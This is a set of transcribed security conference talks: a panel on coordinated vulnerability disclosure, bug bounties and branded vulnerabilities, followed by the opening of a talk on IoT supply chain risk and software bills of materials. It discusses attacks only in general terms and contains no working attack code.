research. 
So from the industry, or rather the bug hunter, professional or not, there is very often an element of good old fashioned fun. I started out hacking things not because I wanted to achieve anything with it, just because it was great fun. When you become a pro with it, there are different motivations. So if you work for a company and you work on their products, obviously your motivation is to make those products secure. And sometimes, in my past job, I did some research and that was sponsored by that company, but essentially me doing what I like to do. And their end of it was attention to that company's competencies. And my end, of course, was having a bit of fun. So that is probably pretty typical of what hackers get out of hacking. Yeah, from the more academic side, it's more about advancing the field, the knowledge in the field, and there you try to figure out how things work and what the implications are, what the security implications of certain understandings are. For instance, understanding when you can execute a certain piece of code and that does something that is not intended. What are the implications? And this is interesting from a security perspective if it enables someone to do something that they shouldn't be allowed to do. Yes, often this involves disclosing a vulnerability to a vendor. But I would say that, for instance, bug bounties, which might be very relevant for people from the industry, play a smaller role in academia, because you have to participate in CVD anyway; if you didn't, then you would get a lot of problems in the academic community. There's a lot of peer pressure that you participate in this because that's the only ethical approach to handling vulnerabilities. At the same time, if you keep them secret for too long, then there's also the question of why you kept them secret for so long. 
Maybe also some perspective that I can share: in academia, you see more and more often that academic publications are easier to publish if you have a CVE. I don't think that's a good thing, because I think that a CVE does not necessarily describe that a research result really brings you new insights. A CVE is an identifier for a vulnerability, not an identifier that says this is something with a new insight. Also, if you participated in CVD and you mention this in the paper, this also gives you bonus points, at least that's my impression, to get the paper published. Of course, it's good if you participate in CVD, but my feeling is also that this is going a bit too strong and it's now overemphasized in our community. What about having an icon or a fun name? Of course, I'm really a big fan of logos and names and anything that is fun. But of course, there are multiple layers here. For instance, we had this paper, Hello from the Other Side, which had this name not just by coincidence. It was about a covert channel in the cloud where we send data through the cache from one virtual machine to the other. We really went crazy on that. We built an entire TCP stack on top of that and tunneled an SSH session through the cache covert channel, for whatever reason. We then sent a music video through this cache covert channel. Of course, we couldn't just take any music video, so we had to make our own parody of Hello from the Other Side. This is just fun. We are just a bunch of people and we like to have fun. Basically, once you've finished your project, it's really nice to close it up with something nice and funny. Logos, on the other hand, also help communicate about the issue. I realized that every time I create slides, my favorite slides are the slides that don't have any words on them, just pictures, logos and icons. Then I can follow the speaker. I don't have to read, because I'm very bad at reading. I can't read and listen at the same time. 
I bet many people can't do that. If there are only icons, symbols and logos, I can follow what the person is saying and look at the images at the same time. I'm always annoyed if I have to speak about a vulnerability and I don't have a logo for it, because then I have to put text on a slide. Since Daniel brought it up, let me ask the other panelists: how do you all feel about branded vulnerabilities? Do you like logos? Do you find that helpful to you and your constituents? I'm sorry, Daniel, no. When there's a logo or a PR push or everything, it grabs the media's attention so quickly. Sometimes the issue is not that severe, or very hard to actually exploit. It gives a little bit of extra fear to our customers. It also encourages us to maybe reprioritize other issues first, which are more severe to our customers. Although I get the point, it's easy to talk about it. They grab the media's attention really quickly. If you put a caveat about the real severity of the issue in there, maybe that would help a little bit. We often have in our team this discussion: should we have a logo, should we have a website, or shouldn't we? For most of our papers and most of the vulnerabilities that we discovered, we don't. I think that's also the responsibility of the researcher to assess: is this something that significant that I need this additional PR, or is it not? Right. Well, then you're doing it the right way. Maybe, but it's also, I mean, I will have a different view on what is really important than you have. Everyone will have a different view on that. So something that I think is really, really important, you might say, well, it's not really exploitable in our use case. Right. We don't ever want to downplay a researcher's work. I mean, it's important, whatever they do, and we appreciate them especially doing CVD with us and not zero-daying us. But yeah, it's more a matter of, especially in a bigger industry when you're trying to protect your customers best, how do you approach it? 
There is a fight for customer attention. And for customers to make the right security decisions, they need to be attentive to the right things. And logos and hype in the press warp that, and we have bad security outcomes for our customers due to that. Then of course, there's also the thing that even fixed vulnerabilities sometimes cause a lot of suffering for system administrators running around in basements and patching systems and the like. And to some extent, I sometimes find overhyped bugs disrespectful to those people. Yeah, so in my case, I don't have an issue with logos or anything, even though in a previous call and a couple of exchanges, Daniel, I alluded to that. Whether it's a logo, as a matter of fact, even at Cisco, we had the first vulnerability with emojis. So we have emojis, logos and everything else. So at the end of the day, if it helps to have an alias for a vulnerability and bring some awareness, I'm perfectly okay with that. The only challenge that I'm seeing, or opportunity, right, is that in some cases, whenever we write information, and even vendors, whenever we, you know, in my case, we have a research institution at Cisco called Talos and we find vulnerabilities in other people's products, right. And yes, yes, yes. So in that case, yes, we also have logos and we put them out there and we put the blog post out and so on, right. But what we need to do collectively is to make sure that the media is not either downplaying it or blowing it out of proportion. So we have to have a balance, right, and we all, you know, say the media, the media, the media, right. So what is our responsibility right there in how we create our security advisories? 
And it's both ways; you know, even though we're vendors here and everything, you know, we have to point fingers at ourselves: how clear are our advisories, do we have some collateral so that the end consumer actually knows, you know, what the implications are, and do we work with the researcher to make sure that we all understand, you know, what the problem is. And in the previous conversation, I also mentioned that the biggest nerd fights in history happen whenever it comes to CVSS scoring, right. And, you know, whenever it comes to risk, at the end of the day, whether it's CVSS or whenever we come up with some new ways and everything, we have to have some type of way of saying, yeah, you have to jump right now and fix this vulnerability versus the other 100 criticals that we were also, you know, dependent on. And especially nowadays, since it's not so much a vulnerability coming from a Cisco or an Intel or a Red Hat or anything else, it's open source, right; by the time that I'm boring you to death in here, probably three more CVEs that are super important have been disclosed. And we don't know about them, right. So that's the type of balance, the type of, I guess, for a corny way of saying it, orchestration that needs to take place, right, in this CVD. I want to add another point here regarding the overhyping and having a logo, having a website for a vulnerability, for a research result. It does not necessarily mean that you overhyped it. We had experiences where we just put papers on arXiv without any website, without any logo or anything, and media picked it up and media reported about it, and not necessarily correctly in all cases. And we had this, for instance, for the Take A Way paper, where we analyzed some side channels on AMD CPUs; media picked it up, we intentionally didn't make any website or logo, but media picked it up and the reporting. 
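Since the "nerd fights" here are about how CVSS numbers get produced, a minimal sketch of the CVSS v3.1 base-score arithmetic may be a useful reference point. The metric weights and the Roundup function below follow the public FIRST v3.1 specification; the helper itself is illustrative, not an official implementation.

```python
# CVSS v3.1 base metric weights (from the FIRST specification).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}   # Attack Vector
AC = {"L": 0.77, "H": 0.44}                          # Attack Complexity
PR_U = {"N": 0.85, "L": 0.62, "H": 0.27}             # Privileges Required, Scope unchanged
PR_C = {"N": 0.85, "L": 0.68, "H": 0.5}              # Privileges Required, Scope changed
UI = {"N": 0.85, "R": 0.62}                          # User Interaction
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}               # Confidentiality/Integrity/Availability

def roundup(x):
    # v3.1 "Roundup": smallest number to one decimal place >= x,
    # with the integer trick from the spec to avoid float artifacts.
    n = round(x * 100000)
    return n / 100000.0 if n % 10000 == 0 else (n // 10000 + 1) / 10.0

def base_score(av, ac, pr, ui, scope, c, i, a):
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = 8.22 * AV[av] * AC[ac] * (PR_U if scope == "U" else PR_C)[pr] * UI[ui]
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope == "C":
        total *= 1.08
    return roundup(min(total, 10))

# AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, a classic network-exploitable critical:
print(base_score("N", "L", "N", "N", "U", "H", "H", "H"))  # 9.8
```

Two vendors who disagree on a single metric, say Attack Complexity Low versus High, land at 9.8 versus 8.1 for the same bug, which is exactly the kind of prioritization argument the panel is describing.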
It was not entirely wrong, but it was definitely, I would say, definitely overhyped. We discussed this also in our team, and the conclusion we had was that in some cases we should have a website, even if it's not a vulnerability that we want to hype, because it's not that significant, but just to have a very clear message which says how relevant it is. I think that's the important part that we also always had on our websites: a short three-sentence summary, like what is it, who has to care about this, and what can an attacker do. Yeah, I think that's great. It's great you do that and it's good advice. I think, you know, I would love to see it be more adopted in the researcher world. For sure. I think it would help out. Before I move on to my next question, I'm just going to say, when I retire, all of you in vendor world are doomed, because I'm going to offer my services to El Reg for free writing up crazy headlines. But to touch on a point that Daniel made, he invoked the Katie Moussouris clause. Let's talk about bug bounties and CVD. Oh, Katie, maybe you should take that one. Because our friend Katie here at Intel actually has a lot to do with that in her organization. Could you maybe talk about how coordinated disclosure interacts, both good and bad, with bug bounty? Yeah, so I love Katie Mo. I think that, first off, let me just say that it is an honor to be confused with Katie Mo. My hair color is, like, you know, getting close to hers too now. I don't know. I think I have been accepted to conferences because they thought that I was she. When I showed up, I don't think they were nearly as excited to see me instead of her, so. But so, yeah, bug bounties. So bug bounties, tin foil hat really. So I'm trying to be serious here about bug bounties. So a bug bounty is a tool, right; they're a tool in a toolkit, and they are there to incentivize, but they're a part of a well-structured product security portfolio. 
They're not the whole thing, and there are different motivations that will help people from different perspectives. So in the academic world, for instance, bug bounties may not weigh as much, because a lot of academic institutions don't allow an individual to accept the cold hard cash, right. If you are a professional bug hunter, you know, that might be how you pay your mortgage, and so there's a lot more tied to that. But the problem becomes that, like, bug bounties are a wonderful tool and they're great, but you have to have a good program in place already to accept that information, to be able to execute on that information, and to figure out, like, there are so many questions about it: how do you award, how do you manage it, are we going to tie the payments to CVSS scores, are we going to tie the payments to a well-thought-out proof of concept? There are so many pieces that go into it, and so I'd say, like, bug bounty is not one-size-fits-all; it's going to vary from organization to organization, and some organizations are going to have different timelines, different pieces. It's, yeah, it's complex. So, bug bounty is not the end of the world; bug bounty is a tool. It's a tool in your toolkit. So it's a great tool. I love the tool because I'm the director of it at Intel. But it's not everything. So vulnerability disclosure is more than bug bounty alone. Yeah, I think when you think about it too, like, there's a lot of smaller companies that probably, you know, don't have that, or don't have the funding for it. But that doesn't mean that they're not wanting to work with researchers; they just can't get the budget to do it. You know, so do your best to try to figure out how to reach out to those companies. Hopefully they have a web page or an email address, you know, a secure@ or security@ alias. 
I know we struggle a little bit, but, you know, there's plenty of us around that could help find the right contacts, because we sort of come together from all over the place and we're sort of an expanding group here; I like it. Bug bounties are one of the wonderful signs of how the industry has changed. Back in the 90s, researchers' disclosures were often rewarded with lawsuits. And now people in the industry are working with researchers and have started actually paying the researchers for their efforts. So I very much give a thumbs up on bug bounties, especially because it shows how the industry has changed: hackers nowadays are helpers and not the enemy. Yeah, I thought you were going to say t-shirts for a minute there, in the early days. I'd like to have seen just one t-shirt. Oh, early on it was lawsuits, then it became t-shirts and then maybe stickers and then. Yeah, and now, and now financial. Awesome stickers. So we've touched on it a little bit; let's spend some time now, we're past the top of the hour here. Let's talk about coordinated vulnerability disclosure inside an open source context. So, I'll go last, but let our esteemed panel here, whether it's our researchers or our vendor friends, kind of describe what works out really well and what are some challenges for you within the open source world, which makes up about 90% of all software now. Sure, the open source one? I guess I'll start. So, basically, top of mind for me, and it sounds corny whenever people say, hey, what keeps you up at night and everything else, it's actually open source right now. It's not so much the predicament of using open source; we have to use and embrace and contribute to open source, and I'm a super big fan of that. The challenge when it comes to open source is that it can be anything, right; like IoT, it can be anything, right, and it's critical infrastructure for a lot of things. 
So, to give you somewhat of a real-life, you know, I guess realization that we had a while back, probably about four or five years ago, whenever Heartbleed came: we in the industry, not only Cisco but a whole bunch of other companies, were looking at what to prioritize as far as actually giving funding, doing research, and so on. So we said, okay, OpenSSL and things like that, which are actually super important for us, there's a lot of people looking at them right now. So can we look at things that perhaps are actually critical infrastructure that nobody has actually taken a look at, right? We're going down the list. And, as a matter of fact, that number two is perfectly fine, because there are two guys that work on OpenSSL that get paid to do it. Yes, indeed, indeed. And the example that I was going to go to is NTP, the Network Time Protocol, NTP specifically. And there it's also two guys, who don't get paid, which is bad, right; it's not even their full-time job, right. Well, I guess if you fast forward to this year, it's a little bit better now, right, so it's a lot better. And it's not that the problem is the poor guys that are actually contributing to the code; it's a matter of scalability, it's a matter of actually even, you know, running static analysis on the thing, which didn't even exist, you know, five years ago for these components. Now of course we're modernizing our ways; you know, even if you submit things on GitHub, a lot of things are actually happening and we're getting better, for sure. It's just that it's getting way more complicated, right, and more people are, not only of course contributing, but using it more than contributing, which is the other predicament. And in some cases, we were talking about bug bounties; in some cases they're actually amazing. 
I'm a big fan of bug bounties, right; the challenge is that in some cases we also don't think about, does this affect other vendors? And maybe you're actually finding some type of vulnerability that, you know, perhaps, yes, it's a SQL injection or cross-site scripting, which is actually pretty common, but I'm doing some fuzzing and I, you know, crash an application. What is the underlying issue, right? And in some cases it actually becomes kind of a commodity, you know, goes back and forth, and it hasn't been shared. And then two or three months down the road you say, oh, but this CVE was not shared with these other vendors that are also affected. So we go back, and in some cases you actually see people trying to find the same, or having found the same CVEs, and they reported them a different way, but, you know, there was no coordination. So those are the things that are crucial, right, for us to be successful, and not only among vendors but actually downstream and upstream as well, right, so especially when it comes to IoT, that's like number one. Yeah, so Omar, you brought up a few points; you know, one is who do you bring in, right, ahead of time, and I think that we're seeing that even if you're the competition, we still want to work together in the background here. You know, our whole goal is to protect our customers, and we often have the same customers even if we're competitors. So we like to, you know, make sure that we're all working together, and the idea is, when do you bring someone in, and it's not only the researchers. Okay, CRob, you've got your hand raised, go ahead. Can I tell you a secret? Yes. Open source has worked with our competitors for 25-plus years. Yeah, yeah, well, I would have to say, we, you know, with some of those other vendors in the industry, it wasn't always so nice. They were playing with the closed source. We're getting better. 
But I think not only the researchers should be thinking about who else is affected; when we are on the receiving end, we should be thinking about who else is affected and bring them in. I recently worked on an issue, a very recent one, where we were in Keybase and the researchers were in there right with the industry people who were fixing the issue. And there was great, you know, coordination amongst the group there. It was pretty awesome to see how much we've evolved. How do you do that, though, with like open source, though, when everything's shown? It's super easy. Well, I guess I'll chime in before we let other folks. I found it very interesting how some vulnerabilities have been patched wide in the open under the cover of some other patch. I don't know what, yeah, I don't know what you're talking about at all. So, in general, open source, there is no single definition of what open source is. You could have two young ladies in Bangladesh that have an amazing idea and they're just trying to get this creativity out there to share with the world. You could have large corporations, like a lot of the folks represented here. I mean, you can have academics. So open source is a lot of different things, and there's really no one definition or moniker that works with every community. But if you're thinking about the types of open source that might make up a product or some kind of a cloud offering, you're going to have the high end of the spectrum, things like the kernel group, which is very mature and organized, and then you start moving down to, like, the Apache Foundation, these other large communities, and then you get down to something where it's a single person, or a couple of people that are just playing around. 
And it's hard to put any kind of structure or process on all these different models, because a lot of people that code for open source are doing it for free, for no remuneration from the large companies that make a lot of money off of it. But they do it for free because they love adding value and expressing their creativity. And as Daniel mentioned, open source is very creative, and some of the larger projects do have ways to privately take in data. So we can take in a private bug report; that's been well established within the community for a long time. And when you're looking at a less mature community or package or library, they might not have that capability. And that's where larger kind of big brothers and big sisters, like a Red Hat or a SUSE or a Canonical, step in and try to help mentor these smaller projects, to help them get these good practices set up so they can take in a private report. Because, I mean, my team, we track between 3,000 and 5,000 vulnerabilities a year out of 450,000 packages. That's a lot. Not all of them really bubble up to the level where they need the attention of, like, a Spectre, Meltdown or a Heartbleed or a BlueBorne, all the other big-name nonsense things. But they still need to get fixed, and what open source is really good at is: you identify a problem, the team attacks it collaboratively, they develop a solution and release that update very quickly. And they don't like to spend a lot of time making a big deal out of it, because they've already moved on to the next feature, the next big thing. But yeah, it can be challenging, but there are definitely ways to do it. There are methods to do it. There are groups that allow this. I hear a lot of bleeping in the background. What's going on, folks? I'm wondering when you're going to change your hat again. Sorry. There we go. Bring out Big Red. All right, let me get this panel back in order. 
When you're thinking about doing a CVD, what are some things you might want to prepare for? What can you do to help make that coordination very successful? And let me start off with, we'll start off with Lisa, because she has a lot of ideas. So from your perspective, what will make you successful when you're getting ready to do this multi-party coordination? So I guess it depends on how familiar you are with it or not. If I was a researcher and I wasn't too familiar, I would potentially utilize CERT or something like that if I felt like it was going to cross over more than one company in the industry, just to have them help. Because I think it could be overbearing to figure out how, if, you know, company A wants this date to get it fixed and company B wants another date and company C wants another date. So I think that's one route a researcher could use. But I think the idea is to figure out, when you start, what are your rules? What's your embargo date? How many days do you actually want to, you know, give the company or vendor to fix the issue? Basically, it's 90 days. I would prefer that as a company. I think it's respectful to do that, especially when things get more difficult. So think about your rules and what you want to do and how you want to approach it. But I'll pause there because I know we're running out of time to get other people in. Anders, what are your thoughts about how you could make CVD successful? Three things. Use it. It's a tool not only for vendors but also for hackers. Listen to what vendors are saying, or what hackers are saying, and try to make the best out of it, and be aware that there's often a lot of complexity involved with it. Be patient, right? Yeah. Omar, what are your thoughts on how you can make CVD successful? Yeah, I think I'm going to capitalize on something that Daniel mentioned in a previous call. 
And in some cases, even if you provide some data to a vendor or whoever, right, whenever you're coordinating, you have to make it first easy to understand. But at the same time, in some cases, getting the right people at the right place at the right time to make sure that you understand the technical implications of a given vulnerability, instead of running around, because even if you have the 90 days or 60 days or 100 days, getting that streamlined and modernizing the way that we actually exchange the information among all the affected parties, that is number one. And Art Manion, who is actually a good friend of mine, he leads the team at CERT. We all love Art. He's the first one that will tell you we cannot scale. This is a big ecosystem. Having a Rolodex of all the vendors that actually use a component is foolish, right? We will never, ever be able to actually have a complete thing. But what we have to think about, as Lisa mentioned, is that in some cases we are working with competitors, right? Even more than with our own companies. For example, you know, I work with Lisa a lot. I work with Juniper even more; in some cases more than I work within Cisco whenever it comes to fixing a vulnerability, let's say in BGP, OSPF or whatever the case might be. So that type of thinking of, oh, I'm not going to talk to these competitors, they're probably my enemy or whatever, you know, that's a 20-years-ago fallacy. And then the last one is that at the end of the day, I have the reality, and I tell my guys at Cisco, that whenever I push the button and publish a CVE out there, the number ones actually reading that CVE are the bad guys, right? And probably at the same time that you're committing open source code, you know, probably that's going to be the case too. So what we have to do is think about how we can exchange information with the consumer, with downstream and upstream providers, in a more modern way. 
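As a concrete illustration of the "more modern way" of exchanging advisory information among affected parties, here is a small Python sketch that emits an advisory as structured JSON that downstream tooling can ingest, rather than prose that has to be scraped. The field names are loosely inspired by the shape of CSAF-style advisory documents, but this is a made-up, simplified layout, and the advisory ID and CVE number are placeholders, not real identifiers.

```python
import json

def make_advisory(advisory_id, title, cve_ids, affected_products, severity):
    # Assemble a dict that can be serialized, signed, and consumed by
    # downstream and upstream parties without human parsing of prose.
    return {
        "document": {
            "title": title,
            "tracking": {"id": advisory_id},
        },
        "vulnerabilities": [
            {"cve": cve, "severity": severity, "affected": affected_products}
            for cve in cve_ids
        ],
    }

adv = make_advisory(
    "EXAMPLE-SA-2020-001",         # hypothetical advisory identifier
    "Crash in example NTP daemon",
    ["CVE-2020-00000"],            # placeholder, not a real CVE
    ["exampled 1.0 through 1.4"],
    "high",
)
print(json.dumps(adv, indent=2))
```

Because the same document structure is used by every party in the coordination, a consumer can match the `cve` and `affected` fields against its own inventory automatically, which is the scaling property a Rolodex of vendor contacts can never provide.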
And another, it sounds corny, but can we actually make it machine readable? Right? So in the case that we actually have that Rolodex of people and everything else, get some tooling. And that's what Art and the folks at CERT also do; we're creating tools that allow us to do that. Even two years ago that didn't exist; it wasn't even a thought. So we have to move faster. That's the one thing that I want to say. So as I close, I'll say Art Manion has the best facial hair in the industry. I love Art. I want to thank our panel here. This was a great hour together. I really appreciate your time and expertise. We're going to be hanging out for a little bit on this awesome Discord channel that my kids made fun of me all week about, because I've had it up. Thank you, everybody, for coming, and thank you for your attention here, panelists. And thank you to the audience and to DEF CON for having us here at the IoT Village. Enjoy your day and enjoy the rest of the con. Got some great stuff lined up the rest of the weekend. CVD all the way. Oh yeah. We're out.
Under the best of circumstances, coordinating disclosure of vulnerabilities can be a challenge. At times it can feel like everyone involved in CVD has conflicting motivations. The truth is that all of us are aspiring to do the right thing for end-users based on our perspective. The panel will share experiences and show how researchers and technology companies can work together to improve the impact of disclosing vulnerabilities on the technology ecosystem. Join CRob (Red Hat), Lisa Bradley (Dell), Katie Noble (Intel), Omar Santos (Cisco), Anders Fogh (Intel) and Daniel Gruss (TU Graz) for an exciting and engaging dialog between security researchers and industry experts on the Joy of coordinating vulnerability disclosure.
10.5446/50733 (DOI)
All right. All right, all right, all right. What's up, y'all? Welcome to my talk, IoT Under the Microscope, here virtually. It's kind of disappointing; I'm looking at a screen here instead of all of you in the audience, but hopefully we'll get through this and have a good time doing it. I want to talk about vulnerability trends in the supply chain. I've got some very interesting things I think we found, given our dataset size, so hopefully you'll learn something here and we'll have a little fun while doing it. All right. Okay. So who am I? I'm Parker Wixel. I was born and raised here in Columbus, Ohio. I've got 25 years of industry experience in cybersecurity, software development, and full-stack development, the last 10 years of which have really been focused on cybersecurity research and product development. I was a contributor and developer on open source security projects like afl-unicorn, a fuzzing framework for emulated binaries, and Patchwork, which does static patching of Linux kernels for debugging purposes. Like it was mentioned, I'm a senior engineer at Finite State. We're an IoT cybersecurity firm dealing with a lot of the topics we're talking about here, and all my datasets and such come from our Finite State repos and some of the products we're working on. I'm also a database lecturer over at the Ohio State University, looking to kick off yet another fall there. And then I'm a composer and a musician; don't hold that against me. I realized early on that there's not a lot of money in music, so here I am on just another passion of mine, computers. Why is this talk relevant to your interests? We're going to be talking about supply chain trends, vulnerable and not vulnerable, vulnerability standards and reporting, and then some firmware statistics and observations.
Probably the first half of the talk is going to delve into the background of what supply chains are, some of the ways we have to talk about vulnerabilities, and what the supply chain introduces as far as vulnerabilities and visibility into those. Then the last half will delve into the fun numbers, probably why you came to see this talk. Nevertheless, hopefully we learn something in both parts. The dataset I'm pulling from: we do have partnerships with some private industry partners, and we do not include all of our private repos and such, but for this particular talk I've got about 7 million files, representing about 50,000 firmware images, 10,000 distinct product lines, and 150 different vendors. This spans different architectures and different operating systems; a lot of them are Linux-based, and some of them are RTOSes, obviously. We're hitting all the different verticals you usually hear about in these talks: medical devices, critical infrastructure, security devices, home routers, Alexa, whatever. We've got a bunch of different types of products in our dataset. For the statistics we talk about in the second half, keep that in mind; it's fun to be able to trawl a dataset of this size. Let's take a step back. Let's talk about the supply chain, the problems that are introduced as part of it, and maybe even go into some of the solutions. If you are manufacturer XYZ making a security camera, that security camera is running some sort of firmware on it. There's hardware and there's firmware. The firmware is actually software that's written for that hardware device. We like to think of it as firmware because it's kind of baked in; it's usually not as fluid or as dynamic as software tends to be on, say, a PC. But the camera still has a full processor and memory architecture. It's a full computer running in that thing.
If you can take advantage of that, or take over that product from a vulnerability standpoint, you've accessed a whole computer's worth of resources. You have hardware components that go into the thing. You have drivers that talk to that hardware, operating systems, libraries, apps, you name it. They're all just the same, except they're called firmware. The problem, on a security camera like this or any kind of IoT device, is that you're going to have multiple vendors. If you're company XYZ making this product, those hardware components may come from various different vendors, and then there may be other vendors, like vendor A, who talks to your underlying camera optics and puts some image recognition on top of it, or whatever. Vendor B may provide some support libraries. Where the real problem comes in is that not only do you have to track vendor A, vendor B, and vendor C and everything they're putting onto your device, which quite frankly is not always disclosed in full, but vendor A and vendor B may also rely on an open source library somewhere, from vendor X, that you don't even know about. They may not even know they're using it, depending on whether their developers have reported it. The thing that makes it even worse: that vendor X library, say it's the same low-level image processing library, may be version 1.1 in vendor A's libraries, while vendor B's libraries included on your device have 1.5. Maybe vendor A's 1.1 version of vendor X has a vulnerability in it and the 1.5 version doesn't. How do you know what component libraries you have in this simple camera? This is a full computer running on your network, right? So Donald Rumsfeld, when he was Secretary of Defense, brought together this notion that information can be divided into three categories, he said at the time: known knowns, known unknowns, and unknown unknowns. We take that kind of approach toward IoT vulnerabilities.
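The transitive-version problem described above can be sketched in a few lines of Python. Everything here is invented for illustration (the component names, versions, and the nested-dict shape are not from any real SBOM tool): the point is just that flattening a supplier tree is what lets you spot the same library pulled in twice at different versions.

```python
# Hypothetical sketch: walk a nested vendor dependency tree and surface
# any third-party library that appears at more than one version.

def collect_components(component, path=(), found=None):
    """Recursively flatten a dependency dict into
    (name, version, path-through-suppliers) records."""
    if found is None:
        found = []
    found.append((component["name"], component["version"], path))
    for dep in component.get("deps", []):
        collect_components(dep, path + (component["name"],), found)
    return found

def version_conflicts(root):
    """Group flattened components by name; report names that appear
    under more than one version anywhere in the tree."""
    by_name = {}
    for name, version, _path in collect_components(root):
        by_name.setdefault(name, set()).add(version)
    return {name: vers for name, vers in by_name.items() if len(vers) > 1}

# Made-up camera firmware: vendor A ships libimage 1.1, vendor B ships 1.5.
camera = {
    "name": "camera_firmware", "version": "2.0", "deps": [
        {"name": "vendor_a_sdk", "version": "3.1", "deps": [
            {"name": "libimage", "version": "1.1", "deps": []}]},
        {"name": "vendor_b_support", "version": "0.9", "deps": [
            {"name": "libimage", "version": "1.5", "deps": []}]},
    ],
}

print(version_conflicts(camera))  # libimage appears at both 1.1 and 1.5
```

The `path` field is what tells you *which* supplier dragged each copy in, which is exactly the question a vendor can't answer today without this kind of inventory.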
Our known knowns are vulnerabilities that have explicitly been discovered through scanning and testing on our devices. We've tested it, we know there's a vulnerability, we patch it, and so on. So those are our known knowns. Our known unknowns are newly created software versions, or even just upgraded versions, or libraries we've pulled in, that we don't have any kind of application testing behind yet. So who knows what's going on under the hood there? We know the device; we just don't know if there are any vulnerabilities there. And then the last of the three categories, unknown unknowns, are vulnerabilities that are in your camera or your device that you don't know about and that nobody else knows about. These are what we call zero days, all right? Or not even zero days, because we haven't discovered them yet; take Ripple20. Ripple20 was discovered just a month or two ago. Before then, it was an unknown unknown. It was in all these different devices, but nobody knew it was there. The weakness was still there, waiting to be discovered. So there's an awful lot of work to be done in discovering zero days. As security researchers, we know that trying to protect yourself and get through all that is really a challenge, trying to find out what is vulnerable or not. So for this talk, we're going to talk about unknown knowns. This is a fourth dimension that we like to talk about, comprising that which we intentionally refuse to acknowledge that we know, or don't like to know, okay? These are vulnerabilities that are known to exist but that have not been associated with all the systems that are actually affected. So we know all these CVEs are against this OpenSSL library, but we don't know if that OpenSSL library is in our device. So we're just going to kind of ignore it for now.
This unknown knowns category is where we can do an awful lot on our part, as manufacturers or security researchers, to ferret out, discover, and patch before other actors out there find the same vulnerabilities and test them against your same device. All of that can be done through a software bill of materials. A software bill of materials, or SBOM: there's a bill of materials in the manufacturing world, which they're very used to, listing all the components that make up certain devices. So if you're buying a big printing press or whatever, you know all the pieces that make up that printing press, so you can plan maintenance and you know what the cost is going to be up front. As a software industry, an IoT industry, we should have the same thing, the software bill of materials, but we don't. All right. So manufacturers don't know all their components, all the different chips and systems-on-chip running inside their devices. All kinds of vendors don't know all their suppliers, and their suppliers' suppliers, because a lot of times vendors will design a product but then ship it off to a manufacturer to actually build it for them. So how do you validate that things are exactly as you designed them? And then consumers, those of us who put these devices into our critical infrastructure, our security systems, our monitoring networks, even our homes: we put these devices into our networks, but we don't know all the software that's running on those devices. The analogy is this: if you found a laptop out in the parking lot of your company, would you bring that laptop in, boot it up, and plug it into your critical infrastructure security network, just to poke around on the laptop and see what's running on it?
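The generate-and-validate idea behind an SBOM can be sketched very simply: record what's in a firmware tree, then diff another build against that record. This is only an illustration of the concept, not a real SBOM format like SPDX or CycloneDX, and the file paths and contents are made up.

```python
import hashlib

def make_sbom(files):
    """files: dict of path -> raw bytes (a stand-in for an unpacked
    firmware image). Returns path -> sha256 hex digest."""
    return {p: hashlib.sha256(data).hexdigest() for p, data in files.items()}

def validate(sbom, files):
    """Return paths that were added, removed, or changed relative
    to the recorded bill of materials."""
    current = make_sbom(files)
    added = set(current) - set(sbom)
    removed = set(sbom) - set(current)
    changed = {p for p in set(sbom) & set(current) if sbom[p] != current[p]}
    return added, removed, changed

# Golden build vs. what actually came back from the contract manufacturer.
golden = {"bin/busybox": b"v1", "lib/libssl.so": b"v2"}
shipped = {"bin/busybox": b"v1", "lib/libssl.so": b"v2-tampered",
           "usr/bin/backdoor": b"oops"}
sbom = make_sbom(golden)
print(validate(sbom, shipped))  # flags the tampered library and the extra file
```

Real SBOMs track component names and versions rather than just file hashes, but the same diff answers the "did the factory ship exactly what I designed?" question raised above.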
And I would hope that most or all of you would say no, there's not a chance you would ever do that, because we know those are full computer systems with operating systems that can be compromised with viruses, malicious software, et cetera. And yet we don't apply that exact same mentality to IoT devices. We'll take a camera where we do not know all the software that's running on it and all the weaknesses that might be inherent in that software, and we'll plug that same camera into our critical infrastructure network and talk to it there. We don't have any way to enumerate this. So how do we generate one of these software bills of materials reliably? How do we keep track of all those components? And say it were even possible to keep track of all the components in there, how do we validate one of our devices against one? We as manufacturers may develop a device and know exactly what we want on it, but if we send it away and it comes back, who's to say that whoever built that device for us put our firmware on there exactly as it was intended and didn't slip something else in? The other thing, and this has happened, is this: if you as a consumer have a device and you want to update it to the latest patch, say there's a security vulnerability and you want to patch it, you go to the manufacturer's or vendor's site, you download the update for that firmware, and you flash your device with it. How do you know that software wasn't compromised? We have seen places in the industry where update servers have been compromised by malicious actors, custom firmware has been placed there as updates, and customers have downloaded malicious updates to their devices, which might have been perfectly fine in the first place but are now running malicious software.
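The minimum defense against the compromised-update scenario just described is checking the downloaded image against a digest published through a separate channel. A sketch (the image bytes and digest here are invented):

```python
import hashlib

def verify_update(image_bytes, expected_sha256):
    """Return True only if the downloaded image matches the digest the
    vendor published out-of-band (e.g. on a separate, signed page)."""
    return hashlib.sha256(image_bytes).hexdigest() == expected_sha256

good_image = b"firmware-v1.2.3"                       # stand-in image bytes
published = hashlib.sha256(good_image).hexdigest()    # vendor-published digest

print(verify_update(good_image, published))                       # True
print(verify_update(b"firmware-v1.2.3-with-implant", published))  # False
```

Note the limitation: if the attacker controls the same server that publishes the digest, this check buys you nothing; the stronger fix is cryptographic code signing, where the device verifies a signature against a key baked in at manufacture.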
